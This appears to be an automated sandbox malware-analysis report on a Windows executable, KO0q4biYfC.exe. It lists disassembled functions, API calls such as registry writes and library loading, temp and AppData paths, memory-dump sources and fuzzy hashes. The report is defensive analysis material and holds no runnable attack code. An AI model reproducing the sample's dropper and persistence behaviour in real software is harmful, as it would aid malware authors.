Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-1427818558
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 73C61777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DB2
Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DB7
Part of subcall function 73C61B5F: GlobalFree.KERNEL32(?), ref: 73C61DBC

GlobalFree.KERNEL32(00000000), ref: 73C61825
FreeLibrary.KERNEL32(?), ref: 73C618AB
GlobalFree.KERNEL32(00000000), ref: 73C618D0

Part of subcall function 73C62352: GlobalAlloc.KERNEL32(?,?), ref: 73C62383

Part of subcall function 73C62724: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,73C617F6,00000000), ref: 73C627F4

Part of subcall function 73C615C6: wsprintfW.USER32 ref: 73C615F4

Strings

, xrefs: 73C618B1

Memory Dump Source

Source File: 00000000.00000002.1397177339.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1396201484.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1397405949.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1399176376.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_KO0q4biYfC.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 9c1dcaddb4942bc2e8350a918188658c6964e2038a19e9438bc79857131ea9da
Instruction ID: b79b6c05c63af96668857c6e8a55891e9c2f64497586248832ec09e8ba4eaa93
Opcode Fuzzy Hash: 9c1dcaddb4942bc2e8350a918188658c6964e2038a19e9438bc79857131ea9da
Instruction Fuzzy Hash: 3541A072400388EBDB11AF6198D4B9637BCBF08312F1A5065EA0BDE1C6DB78C584C761

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp
API String ID: 2655323295-60209605
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,771B2EE0,00405B1A,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brugser\brugo,?,00000000,?), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\brugser\brugo
API String ID: 1892508949-2288025642
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.KERNELBASE(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(0000539A,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: 063e47513c4376f19a5a3bfc0780f7f4b653f4b7b25b96f5c752c2c38872185d
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
